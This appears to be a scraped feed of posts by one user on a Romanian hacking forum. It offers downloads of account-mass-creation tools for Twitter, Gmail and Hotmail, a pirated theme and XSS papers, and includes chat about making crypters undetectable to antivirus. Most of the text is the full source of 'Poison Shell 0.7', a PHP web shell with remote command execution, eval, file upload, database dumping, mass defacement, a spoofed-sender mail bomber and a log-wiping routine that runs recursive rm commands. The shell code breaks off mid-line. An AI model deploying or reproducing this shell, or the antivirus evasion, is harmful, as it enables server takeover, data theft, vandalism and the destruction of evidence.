io.kent

Patriot NG Patriot is a 'Host IDS' tool which allows real time monitoring of changes in Windows systems or Network attacks. Patriot monitors: •Changes in Registry keys: Indicating whether any sensitive key (autorun, internet explorer settings...) is altered. •New files in 'Startup' directories •New Users in the System •New Services installed •Changes in the hosts file •New scheduled jobs •Alteration of the integrity of Internet Explorer: (New BHOs, configuration changes, new toolbars) •Changes in ARP table (Prevention of MITM attacks) •Installation of new Drivers •New Netbios shares •TCP/IP Defense (New open ports, new connections made by processes, PortScan detection...) •Files in critical directories (New executables, new DLLs...) •New hidden windows (cmd.exe / Internet Explorer using OLE objects) •Netbios connections to the System •ARP Watch (New hosts in your network) •NIDS (Detect anomalous network traffic based on editable rules) Important: You need WinPcap · Download to run Patriot NG[*] Install it first Windows XP, Windows Vista, Windows 7 (32Bits) ---> http://sbdtools.googlecode.com/files/PatriotNG2.01.zip Windows XP, Windows Vista, Windows 7 (64Bits) ---> http://sbdtools.googlecode.com/files/PatriotNG2.0164.zip

MASS Twitter Account Creator MASS Twitter Account Creator is a light weight and very easy to use application that will help you to create multiple Twitter accounts with ease. With this application you can create Twitter accounts without data typing and without any copy paste method. Simply add excel file that give in application folder this standard file that read our application, once you add data in this file in correct format then you can use this file in this application. Data is automatically added in “Sign up” page of Twitter, you simply type captcha code in it. This application supports to set proxy servers with single and multi proxy options. Using this options you can set auto change proxy server timer and auto save output option to save your valuable time and also your work. And it comes with standard Input and outputs excel files that help you to get started. Features: User friendly interface Import excel data input Single and multi proxy server settings Auto change proxy with timer Auto save data Auto type data (don't need to typing via keyboard) One click export output data to Microsoft Excel (XLS) No need to any programming skill ------------------------------------------------------------------------------------------------------- MASS Gmail Account Creator MASS Gmail Account Creator is a light weight and very easy to use application that will help you to create multiple Gmail accounts with ease. With this application you can create Gmail accounts without data typing and without any copy paste method. Simply add excel file that give in application folder this standard file that read our application, once you add data in this file in correct format then you can use this file in this application. Data is automatically added in “Sign up” page of Gmail, you simply type captcha code in it. This application supports to set proxy servers with single and multi proxy options. Using this options you can set auto change proxy server timer and auto save output option to save your valuable time and also your work. And it comes with standard Input and outputs excel files that help you to get started. Features: User freindly interface Import excel data input Single and multi proxy server settings Auto change proxy with timer Auto save data Auto type data (don't need to typing via keyboard) One click export output data to Microsoft Excel (XLS) No need to any programming skill ------------------------------------------------------------------------------------------------------ MASS Hotmail Account Creator MASS Hotmail Account Creator is a light weight and very easy to use application that will help you to create multiple Hotmail accounts with ease. With this application you can create Hotmail accounts without data typing and without any copy paste method. Simply add excel file that give in application folder this standard file that read our application, once you add data in this file in correct format then you can use this file in this application. Data is automatically added in “Sign up” page of Hotmail, you simply type captcha code in it. This application supports to set proxy servers with single and multi proxy options. Using this options you can set auto change proxy server timer and auto save output option to save your valuable time and also your work. And it comes with standard Input and outputs excel files that help you to get started. Features: User friendly interface Import excel data input Single and multi proxy server settings Auto change proxy with timer Auto save data Auto type data (don't need to typing via keyboard) One click export output data to Microsoft Excel (XLS) No need to any programming skill --------------------------------------------------------------------------------------------------- Just Data Extractor Just Data Extractor is the most powerful and easy-to-use data extraction software for web scraping and data extraction from the websites. Just Data Extractor will benefit a wide range of computer users. Let’s say, for example, you need to extract all business (names, address, contact no's and etc.) from a particular website. It's may save you plenty of efforts and an endless string of browsing hours! First you should browse the starting URL from which Just Data Extractor will start crawling, then simply click on "Start Extraction Process" button for data extraction and that’s all! No need to spend time on browsing and tedious cut-and-paste operations. With Just Data Extractor, you can extract data from multiple pages in a blink of an eye thanks to the multithreaded crawling technology that downloads many threads simultaneously. Just Data Extractor allows users to extract data from website such as business directory justdial.com. The extracted data can be exported to a variety of formats, including Microsoft Excel (XLS), TXT, Tab delimited, Comma delimited. This variety of export formats allows you to process and analyze data in your customary format. Features: User freindly interface Single click data extraction process No need to any programming skill Automatically browse & extract all pages from any category Export data to Microsoft Excel (XLS), TXT, Tab delimited, Comma delimited formats download : https://www.box.com/s/wnbyu1p5s6uj23rhn32j

Bounce is a powerful, professional and fully responsive WordPress & BuddyPress theme. code : http://themeforest.net/item/bounce-responsive-business-wp-buddypress-theme/2324726 download : Zippyshare.com - bounce_v1.3.1.rar

Advanced XSS Alexander Sotirov Blackbox Reversing of XSS filters DOM Based Cross Site Scripting or XSS of the Third Kind XSS a fondo XSS completo XSS Evolution download : Mega XSS.tar pass : level-23.biz sursa: level-23.biz

cu aceste programe puteti sa incepeti sa faceti si voi cate un crypter cate ceva comunitati, as foarte utile, WARNING... NU LEAM SCANAT E CEVA TIMP, ASA CA INAINTE SA VA FOLOSITII DE ELE, CEI CARE VOR SI AU NEVOIE DE ELE, SCANATILE, ] as foarte multe si folositoare! download : DepositFiles

astia de la level-23, au membri buni de tot, pe deasupra ca se tin de glume, mai fac si lucrurii bune,..!

deci e tras de vreo 7 cryptere si cateva programe undetectabele, dar ma freaca rau avira, si acum iara ma apuc de el, ca aseara mam grabit, si stub, nu am adaugat, dar acum am venit de la munca si ma apuc de el, deci nu stiu ce sursa vrei? si desing? nu-ti place? eu macar incerc sa fac ceva pentru forum, dar tu?

sa inteleg ca ai citit in graba:) asai:D

nu ai inteles ps-axl am zis ca tie ti se arunca, nu ca tu arunci

pola mea e de la stub, acum am sa ma uit, daca nu termin in cel mai rau caz maine e gata dimineata, ca deja ma doare capul, dar cum draq custom,stub ca am modificat 101 aia vine default 101, cand scriam programul am pus 101 am sa ma uit mai atent peste el, ca si asa e detectat de 2:( sa vad daca pot sa-l scot clean

acum lam terminat, si al postez aici, am vazut ca se arunca vorbe grele, aici pe adresa persoanelor cum ar fi ps-axl, in loc sa vorbeasca aiurea,mai bine ar face ceva util comunitati! download : DepositFiles scan novirusthanks : Report date: 2012-11-09 22:31:19 (GMT 1) File name: cripter-exe File size: 131072 bytes MD5 hash: c74de716a6f105cc086fb4dd5f9b8cda SHA1 hash: 628cb72fc5e69f8650758b641bbfd9557e0cdea5 Detection rate: 2 on 14 (14%) Status: INFECTED maine am sa ma uit mai bine dece nu a iesit fud, e deja tarziu pentru azi ajunge! Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org e facut de mine!

e in spaniola, si rursa ai acolo frate. pune sursa pe google, si te duce acolo daca o lasam in spaniola nu era mai bine sursa : http://alt1040.com/

e tradus cu google, si sursa e acolo, asa ca amuzate in continuare pana mai ai timp!

as sigur ca multi dintre voi o sa ziceti ca nu e bine, si ca e o porcarie, sau asa mai departe, propunerea mea este asa, orice membru din RsT, azi primeste BAN, dupa o jumate de ora, face cont nou, cutarescu, intra cum nu sar fi intamplat nimic, si poate sa descarce orice program vrea, sau are nevoie, evident daca e fara parola si mai usor, parerea mea e asa, sa avem o optiune cand postam, de ex, programul cutare, poti sa vezi pozele, poti sa vezi detaliile, dar ca sa al descarci trebuie sa ai 20 sau 50 de posturi, ca altfel nu poti vedea continutul URL, evident ca trebuie sa fie si o limita de posturi de adaugare, 100 sau 200, maxim,dar cei care intr-un adevar au nevoie de program no sa se comporte aiurea, si o sa aibe grija de comportament, orice stire orice program, sa se ascunda linkul de descarcare,, e o parere!

sia pus ochelari de soare sa vada codul color:)) che ce intrebare iai bagat=)) jimmy frumos!

multi dintre voi nu ati folosit, sau nu ati auzit de aceasta aplicatie, dar e foarte buna, suporta, PDF JPG PNG SVG XML GIF, Diagrams Online | draw.io inainte am folosit si eu de la microsoft, dar odata ce am gasit acest program, lam dat uitari pe cel de la microsoft.

asa e si mai sunt metode, daca imi aduc bine aminte e ceva cu byte .. dar e mai simplu asa cum zice nytro. dar de acest [php shell] poison shell 0.7 code: <?php /* Poison Shell 0.7 Doddy Hackman (C) Doddy Hackman Mail : lepuke[at]hotmail[com] Blog : doddy-hackman.blogspot.com */ @session_start(); $username = "a"; $password = "a"; if (isset($_POST['user'])) { if ($_POST['user'] == $username && $_POST['pass'] == $password) { $_SESSION['loginh'] = "1"; } } if (isset($_GET['chaunow'])) { @session_destroy(); } if ($_SESSION['loginh'] == 1) { if (isset($_GET['info'])) { die(phpinfo()); } if (isset($_POST['sessionew'])) { @session_start(); if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) { echo "<script>alert('Session created');</script>"; } else { echo "<script>alert('Error');</script>"; } } if(isset($_GET['bajardb'])) { $tod = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']); mysql_select_db($_GET['bajardb']); $resultado = mysql_query("SHOW TABLES FROM ".$_GET['bajardb']); while ($tabla = mysql_fetch_row($resultado)) { foreach($tabla as $indice => $valor) { $todo.= "<br><br>".$valor."<br><br>"; $resultadox = mysql_query("SELECT * FROM ".$valor); $todo.="<table border=1>"; for ($i=0;$i< mysql_num_fields($resultadox);$i++) { $todo.="<th>".mysql_field_name($resultadox,$i)."</th>"; } while($dat = mysql_fetch_row($resultadox)) { $todo.="<tr>"; foreach($dat as $val) { $todo.="<td >".$val."</td>"; } } $todo.="</tr></table>"; } } @mysql_free_result($tod); @header("Content-type: application/vnd-ms-excel; charset=iso-8859-1"); @header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls"); echo $todo; exit(1); } if(isset($_GET['bajartabla'])) { $tod = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>"); mysql_select_db($_GET['condb']); if(!empty($_GET['sentencia'])) { $resultado = mysql_query($_GET['sentencia']); } else { $resultado = mysql_query("SELECT * FROM ".$_GET['bajartabla']); } $todo.="<table border=1>"; for ($i=0;$i< mysql_num_fields($resultado);$i++) { $todo.="<th>".mysql_field_name($resultado,$i)."</th>"; } while($dat = mysql_fetch_row($resultado)) { $todo.="<tr>"; foreach($dat as $val) { $todo.="<td>".$val."</td>"; } } @mysql_free_result($tod); $todo.="</tr></table>"; @header("Content-type: application/vnd-ms-excel; charset=iso-8859-1"); @header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls"); echo $todo; exit(1); } if (isset($_GET['reload'])) { $tipo = pathinfo($_GET['reload']); echo '<meta http-equiv="refresh" content="0;URL=?dir='.$tipo['dirname'].'>'; exit(1); } function dame($file) { return substr(sprintf('%o', fileperms($file)), -4); } if (isset($_GET['down'])) { header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=".basename($_GET['down'])); readfile($_GET['down']); } if (isset($_POST['cookienew'])) { if (setcookie($_POST['cookienew'],$_POST['valor'])) { echo "<script>alert('Cookie cREATED');</script>"; echo '<meta http-equiv="refresh" content="0;URL=?cookiemanager">'; } else { echo "<script>alert('Error');</script>"; } } echo '<style type="text/css"> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { font: normal 10px Verdana, Arial, Helvetica, sans-serif; background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 10px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>'; echo "<title>[+] PoisonShell (C) Doddy Hackman 2011 </title>"; echo "<table><tr><td class=main><br><h2> PoisonShell </h2><br></td><td class=main> <b>System</b> : ".php_uname('s')." ".php_uname('r')." ".php_uname('v')."<br><b>Server</b> : ".$_SERVER['SERVER_SOFTWARE']."<br>"; echo "<b>IP</b> : ".$_SERVER['SERVER_ADDR']." <b>User</b> : uid=".getmyuid()." (".get_current_user().") gid=".getmygid()." <b>Path</b> : ".getcwd()." <b>Version PHP</b> : ".phpversion()."<br>"; if (ini_get('safe_mode')==0) { echo "<b>Safe Mode</b> : OFF "; } else { echo "<b>Safe Mode</b> : ON "; } if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") { echo "<b>Magic Quotes</b> : ON "; } else { echo "<b>Magic Quotes</b> : OFF "; } exec("perl -h",$perl); if ($perl) { echo "<b>Perl</b> : ON "; } else { echo "<b>Perl</b> : OFF "; } exec("wget --help",$wget); if ($wget) { echo "<b>WGET</b> : ON "; } else { echo "<b>WGET</b> : OFF "; } exec("curl_version",$curl); if ($curl) { echo "<b>CURL</b> : ON "; } else { echo "<b>CURL</b> : OFF "; } echo "</tr></td></table><br>"; echo " <table> <td class=main><a href=?dir=>Navigate</a></td><td class=main><a href=?cmd=>CMD</a></td> <td class=main><a href=?upload=>Upload</a></td><td class=main><a href=?base64=>Base64</a></td> <td class=main><a href=?phpconsole=>Eval</a></td><td class=main><a href=?info=>phpinfo</a></td> <td class=main><a href=?bomber=>Mailer</a></td><td class=main><a href=?md5crack=>MD5Crack</a></td> <td class=main><a href=?backshell>BackShell</a></td><td class=main><a href=?mass=>MassDefacement</a></td> <td class=main><a href=?logs=>CleanLogs</a></td><td class=main><a href=?ftp=>FTP</a></td> <td class=main><a href=?sql=>SQL</a></td><td class=main><a href=?cookiemanager=>Cookies</a></td> <td class=main><a href=?sessionmanager=>Session</a></td> <td class=main><a href=?chau=>Kill</a></td> </table><br><br> "; if(isset($_GET['perms'])) { echo " <form action='' method=POST> File : <input type=text name=archivo value=".$_GET['perms']."> <br> Perms : <input type=text name=perms value=".dame($_GET['perms'])." <br><br> <input type=submit name=cambiarperms value=Change> </form> "; } if (isset($_POST['cambiarperms'])) { if (chmod($_POST['archivo'],$_POST['perms'])) { echo "<script>alert('cHANGED');</script>"; } else { echo "<script>alert('Error');</script>"; } echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>"; } if (isset($_GET['ren'])) { echo " <form action='' method=POST> File : <input type=text name=nombre value=".$_GET['ren']."><br> Change to : <input type=text name=cambio><br><BR> <input type=submit name=cambios value=Change><BR> </form> "; } if (isset($_POST['cambios'])) { if (@rename($_POST['nombre'],$_POST['cambio'])) { echo "<script>alert('Changed');</script>"; } else { echo "<script>alert('Error');</script>"; } echo "<br><br><font color=red><center><a href=?reload=".$_POST['cambios'].">Atras</a><br><br></font></center>"; } if (isset($_POST['crear1'])) { chdir($_POST['dir']); if (fopen($_POST['crear1'],"w")) { echo "<script>alert('File cREATED');</script>"; }else { echo "<script>alert('Error');</script>"; } echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>"; } if (isset($_POST['crear2'])) { chdir($_POST['dir']); if (@mkdir($_POST['crear2'],777)) { echo "<script>alert('Directory created');</script>"; } else { echo "<script>alert('Error');</script>"; } echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>"; } if (isset($_GET['del'])) { $tipo = filetype($_GET['del']); if ($tipo == "dir") { if (rmdir($_GET['del'])) { echo "<script>alert('Directory Deleted');</script>"; } else { echo "<script>alert('Error');</script>"; } } else { if (unlink($_GET['del'])) { echo "<script>alert('File Deleted');</script>"; } else { echo "<script>alert('Error');</script>"; } } echo "<br><br><font color=red><center><a href=?reload=".$_GET['del'].">Atras</a><br><br></font></center>"; } if (isset($_GET ['copiar'])) { echo ' <form action="" method=POST> File : <input type=text name=archivo value='.$_GET['copiar'].'><br> Copy to : <input type=text name=nuevo><br><br> <input type=submit name=copiado value=Copy><BR> </form> '; } if (isset($_POST['copiado'])) { if (copy($_POST['archivo'],$_POST['nuevo'])) { echo "<script>alert('OK');</script>"; } else { echo "<script>alert('Error');</script>"; } echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>"; } if (isset($_GET['open'])) { echo "<form action='' method=POST>"; echo "<center>"; echo "<textarea cols=80 rows=40 name=code>"; $archivo = file($_GET['open']); foreach($archivo as $n=>$sub) { $texto = htmlspecialchars($sub); echo $texto; } echo "</center></textarea>"; echo "<br><br><center><input type=submit value=Save name=modificar></center><br><br>"; echo "</form>"; } if (isset($_POST['modificar'])) { $modi = fopen($_GET['open'],'w+'); if ($yeah = fwrite($modi,$_POST['code'])) { echo "<script>alert('OK');</script>"; } else { echo "<script>alert('Error');</script>"; } echo "<br><br><font color=red><center><a href=?reload=".$_GET['open'].">Atras</a><br><br></font></center>"; } if (isset($_GET['dir'])) { if ($_GET['dir']=="") { $path = getcwd(); chdir($path); $dir = dir($path); } else { $path = $_GET['dir']; chdir($path); $dir = dir($path); } echo " <br><br> <form action='' method=GET> <b>Directory</b> : <input type=text name=dir value=".$path."><input type=submit name=ir value=Navegar> </form> <br><br> <form action='' method=POST> <b>New File</b> : <input type=text name=crear1><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear> </form> <form action='' method=POST> <b>New Directory</b> : <input type=text name=crear2><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear> </form><br><br> "; $archivos = array('dir'=>array(),'file'=>array()); while ($archivo = $dir->read()) { $ver = @filetype($path.'/'.$archivo) ; if ($ver=="dir") { $archivos['dir'][] = $path.'/'.$archivo; } else { $archivos['file'][] = $path.'/'.$archivo; } } $dir->rewind(); echo "<br><b>Directory Found</b> : ".count($archivos['dir'])."<br>"; echo "<b>Files Found</b> : ".count($archivos['file'])."<br><br><br>"; echo "<table bgcolor=#00FF00 border=1>"; echo "<tr>"; foreach ($archivos['dir'] as $dirs) { $dirsx = pathinfo($dirs); echo "<td width=100><a href=?dir=".$dirs.">".$dirsx['basename']."</a></td>"; echo "<td width=100><a href=?ren=".$dirs.">Move</a></td>"; echo "<td width=100><a href=?del=".$dirs.">Delete</a></td>"; echo "<td width=100><a href=?perms=".$dirs.">Perms</a></td>"; echo "<td width=100>--</td>"; echo "<td width=100>--</td>"; echo "</tr><tr>"; } foreach ($archivos['file'] as $files) { $filex = pathinfo($files); echo "<td width=100><a href=?open=".$files.">".$filex['basename']."</a></td>"; echo "<td width=100><a href=?ren=".$files.">Move</a></td>"; echo "<td width=100><a href=?del=".$files.">Delete</a></td>"; echo "<td width=100><a href=?perms=".$files.">Perms</a></td>"; echo "<td width=100><a href=?copiar=".$files.">Copy</a></td>"; echo "<td width=100><a href=?down=".$files.">Download</a></td>"; echo "</tr><tr>"; } echo "</table>"; } if (isset($_GET['cmd'])) { echo ' <form action="" method=POST> Command : <input type=text name=comando size=50><input type=submit name=ejecutar value=Now> </form> '; } if (isset($_POST['ejecutar'])) { echo ' <br><br>Command<br><br> <fieldset> '.$_POST['comando'].'</fieldset> <br><br>Result<br><br><fieldset>'; if (!system($_POST['comando'])) { echo "<script>alert('Error loading command');</script>"; echo "Error"; } echo "</fieldset><br><br>"; } if (isset($_GET['upload'])) { echo "<center><h2>Upload files</h2></center><center><br><br><br>"; echo ' <form enctype="multipart/form-data" action="" method=POST> File : <input type=file name=archivo><br><br> Directory : <input type=text name=destino value='.getcwd().'> <input type=submit value=Upload><br> </form>'; if (isset($_FILES['archivo'])) { $subimos = basename($_FILES['archivo']['name']); if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subimos)) { if (copy($subimos,$_POST['destino']."/".$subimos)) { unlink($subimos); echo "<script>alert('File uploaded');</script>"; } } else { echo "<script>alert('Error');</script>"; } } } if (isset($_GET['base64'])) { echo ' <form action="" method=POST> Encode : <input type=text name=code size=50><input type=submit name=codificar value=Encode> </form> <form action="" method=POST> Decode : <input type=text name=decode size=50><input type=submit name=decodificar value=Decode> </form> '; } if (isset($_POST['codificar'])) { echo "<br><br>Text<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Result<br><br><fieldset>"; echo base64_encode($_POST['code']) ; echo "</fieldset><br><br>"; } if (isset($_POST['decodificar'])) { echo "<br><br>Text<br><br><fieldset>".$_POST['decode']."</fieldset><br><br>Result<br><br><fieldset>"; echo base64_decode($_POST['decode']); echo "</fieldset><br><br>"; } if (isset($_GET['phpconsole'])) { echo ' <form action="" method=POST> Code : <input type=text name=codigo size="70"><input type=submit name=cargar value=OK> </form> '; } if (isset($_POST['cargar'])) { echo "<br><br>Code<br><br> <fieldset> ".$_POST['codigo']." </fieldset> <br><br> Result<br><br> <fieldset>"; eval($_POST['codigo']); echo "</fieldset> "; } if (isset($_GET['logs'])) { echo ' <br><br><center><h3>Zapper</h3> <br><br> <form action="" method=GET> <input type=submit name=clean value=Start> </form></center> <br><br> '; } if (isset($_GET['clean'])) { $paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", "/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access", "/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"); $comandos = array('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST'); foreach($paths as $path) { if(@unlink($path)) { echo $path.": Deleted<br>"; } } echo "<br><br>"; foreach($comandos as $comando) { echo "Loading command : ".$comando."<br>"; system($comando); } } if(isset($_GET['mass'])) { echo " <form action='' method=POST> Directory to start : <input type=text name=dir value=".getcwd()."><br><br> Code : <input type=text name=codigo size=70> <input type=submit name=def value=Start> </form> "; } if (isset($_POST['def'])) { juntar($_POST['dir'],$_POST['codigo']); } function juntar ($dira,$text) { $dir= opendir($dira); while (!is_bool($archivos = readdir($dir))) { if ($archivos != "..") { if ($archivos != ".") { if ($archivos != basename($_SERVER['PHP_SELF'])) { if (@filetype($dira."/".$archivos) == dir) { juntar($dira."/".$archivos,$text); } else { echo "Deface : ".$dira."/".$archivos."<br>"; $solo = fopen($dira."\\".$archivos,"w"); $solo = fwrite($solo,$text); fclose($solo); }}}}}} if (isset($_GET['chau'])) { if ($_GET['chau'] == "fuckit") { echo "<br><br><h3>Kapoom !!!</h3><br><br>"; //unlink(basename($_SERVER['PHP_SELF'])); } else { echo "<br><br><font color=red><h3><center>Acceso Denegado</center></h3></font><br><br>"; } } if (isset($_GET['bomber'])) { echo " <form action='' method=POST> Target : <input type=text name=idiot value=@hotmail.com><br> Fake mail : <input type=text name=falso><br> Fake name : <input type=text name=nombrefalso><br> Subject : <input type=text name=asunto><br> Count : <input type=text name=count value=1><br> Message : <input type=text name=mensaje size=60><br><br> <br><input type=submit name=bombers value=Now> </form>"; } if (isset($_POST['bombers'])) { $need .="MIME-Version: 1.0\n"; $need .="Content-type: text/html ; charset=iso-8859-1\n"; $need .="MIME-Version: 1.0\n"; $need .="From: ".$_POST['nombrefalso']." <".$_POST['falso'].">\n"; $need .="To: ".$_POST['nombrefalso']."<".$_POST['falso'].">\n"; $need .="Reply-To:".$_POST['falso']."\n"; $need .="X-Priority: 1\n"; $need .="X-MSMail-Priority:Hight\n"; $need .="X-Mailer:Widgets.com Server"; echo "<br><br><br><center><h2>Result</h2></center><br><br>"; for ($i = 1; $i <= $_POST['count']; $i++) { if(@mail($_POST['idiot'],$_POST['asunto'],$_POST['mensaje'],$need)) { echo "[+] Message <b>$i</b> Send<br>"; flush(); } else { echo "[+] Message <b>$i</b> not Send<br>"; }}} if (isset($_GET['md5crack'])) { echo " <form action='' method=POST <b>Hash</b> : <input type=text name=md5 size=50><br><br> <b>Salt</b> : <input type=text name=salto size=50><br> <br><h3>Wordlist</h3> <textarea cols=80 rows=40 name=code></textarea> <br><br> <input type=submit value=Crack> </form> "; } if (isset($_POST['md5'])) { echo "<br><br><fieldset>"; echo "[+] Starting the search<br><br>"; $total = explode("\n",$_POST['code']); foreach ($total as $linea){ $linea = chop($linea); if (!empty($_POST['salto'])) { $test = md5($linea.$_POST['salto']); } else { $test = md5($linea); } if ($test == $_POST['md5']) { echo "<br>[+] Hash Cracked : ".$_POST['md5'].":".$linea."<br><br>"; exit(1); } else { echo "[+] : ".$_POST['md5']." != ".$linea."<br>"; } } echo "<br>[+] Finished<br>"; echo "</fieldset>"; } if (isset($_GET['cookiemanager'])) { echo "<h2>Cookies</h2><br><br>"; echo "[+] <b>Cookies Found</b> : ".count($_COOKIE)."<br><br>"; echo " <br><BR><form action='' method=POST> New cookie : <input type=text name=cookienew><BR> Value : <input type=text name=valor><BR><br> <input type=submit value=Create><BR><br><br> </form><br>"; echo "<table>"; echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>"; if (count($_COOKIE) != 0) { foreach ($_COOKIE as $nombre=>$valor) { echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>"; } echo "</table>"; } echo "<br><br>"; } if (isset($_GET['sessionmanager'])) { @session_start(); echo "<h2>Session</h2><br><br>"; echo "[+] <b>Sessions Found</b> : ".count($_SESSION)."<br><br>"; echo " <br><BR><form action='' method=POST> New session : <input type=text name=sessionew><BR> Value : <input type=text name=valor><BR><br> <input type=submit value=Create><BR><br><br> </form><br>"; if (count($_SESSION) != 0) { echo "<table>"; echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>"; foreach ($_SESSION as $nombre=>$valor) { echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>"; } echo "</table>"; } } if (isset($_GET['ftp'])) { echo "<h2>FTP Manager</h2><br><br>"; echo " <form action='' method=GET> Server : <input type=text name=serverftp value=127.0.0.1><br> User : <input type=text name=user value=doddy><br> Pass : <input type=text name=pass value=123><br><br><br> <input type=hidden name=diar value=/> <input type=submit value=Connect><br><br> </form> "; } if (isset($_GET['renamenow'])) { echo " <form action='' method=GET> File : <input type=text name=renamenowx value=".$_GET['renamenow']."><br> New name : <input type=text name=newname><br><br> <input type=hidden name=serverftp value=".$_GET['serverftp']."> <input type=hidden name=user value=".$_GET['user']."> <input type=hidden name=pass value=".$_GET['pass']."> <input type=hidden name=diar value=".$_GET['diar']."> <input type=submit value=Rename> </form> "; exit(1); } if (isset($_GET['renamenowx'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']); if (ftp_rename($enter,$_GET['renamenowx'],$_GET['newname'])) { echo "<script>alert('Changed');</script>"; echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>'; } else { echo "<script>alert('Error');</script>"; } } if (isset($_GET['deletenow'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']); if ($_GET['controla'] == "dir") { if (@ftp_rmdir($enter,$_GET['deletenow'])) { echo "<script>alert('Directory Deleted');</script>"; echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>'; } else { echo "<script>alert('Error');</script>"; } } else { if (@ftp_delete($enter, $_GET['deletenow'])) { echo "<script>alert('File Deleted');</script>"; echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>'; } else { echo "<script>alert('Error');</script>"; } } } if (isset($_GET['permsdown'])) { echo "<form action='' method=GET> File : <input type=text name=filetochange value=".$_GET['permsdown']."> Perms : <input type=text name=pe value=0777 > <input type=hidden name=serverftp value=".$_GET['serverftp']."> <input type=hidden name=user value=".$_GET['user']."> <input type=hidden name=pass value=".$_GET['pass']."> <input type=submit value=Change> </form>"; exit(1); } if (isset($_GET['filetochange'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']); if (@ftp_chmod($enter,$_GET['pe'],$_GET['filetochange'])) { echo "<script>alert('Changed');</script>"; } else { echo "<script>alert('Error');</script>"; } } if (isset($_GET['serverftp'])) { if ($enter = @ftp_connect("127.0.0.1")) { if ($dentro = @ftp_login($enter,"doddy","123")) { echo "<br><b>[+] Connected to server</b><br>"; } else { echo "<br><b>[-] Error in the login</b><br><br>"; } echo "<b>[+] ONline</b><br><br><br>"; echo " <form action='' method=GET> Directory : <input type=text name=diar value="; if (empty($_GET['diar'])) { echo ftp_pwd($enter); } else { echo $_GET['diar']; } echo "> <input type=hidden name=serverftp value=".$_GET['serverftp']."> <input type=hidden name=user value=".$_GET['user']."> <input type=hidden name=pass value=".$_GET['pass']."> <input type=submit value=Load> </form> <br><br> <form action='' method=GET> New directory : <input type=text name=newdirftp><input type=submit value=Load> <input type=hidden name=serverftp value=".$_GET['serverftp']."> <input type=hidden name=user value=".$_GET['user']."> <input type=hidden name=pass value=".$_GET['pass']."> <input type=hidden name=diar value=".$_GET['diar']."> </form> <br><br> <br><br>"; if (isset($_GET['diar'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']); if (empty($_GET['diar'])) { if (!$lista = ftp_nlist($enter.".")) { echo "<script>alert('Error loading directory');</script>"; exit(1); } } else { if (!$lista = ftp_nlist($enter,$_GET['diar'])) { echo "<script>alert('Error loading directory');</script>"; exit(1); } } } echo "<table>"; foreach ($lista as $ver) { echo "<td class=main>".$ver."</td>"; if (ftp_size($enter,ftp_pwd($enter).$ver) == -1) { echo "<td class=main><a 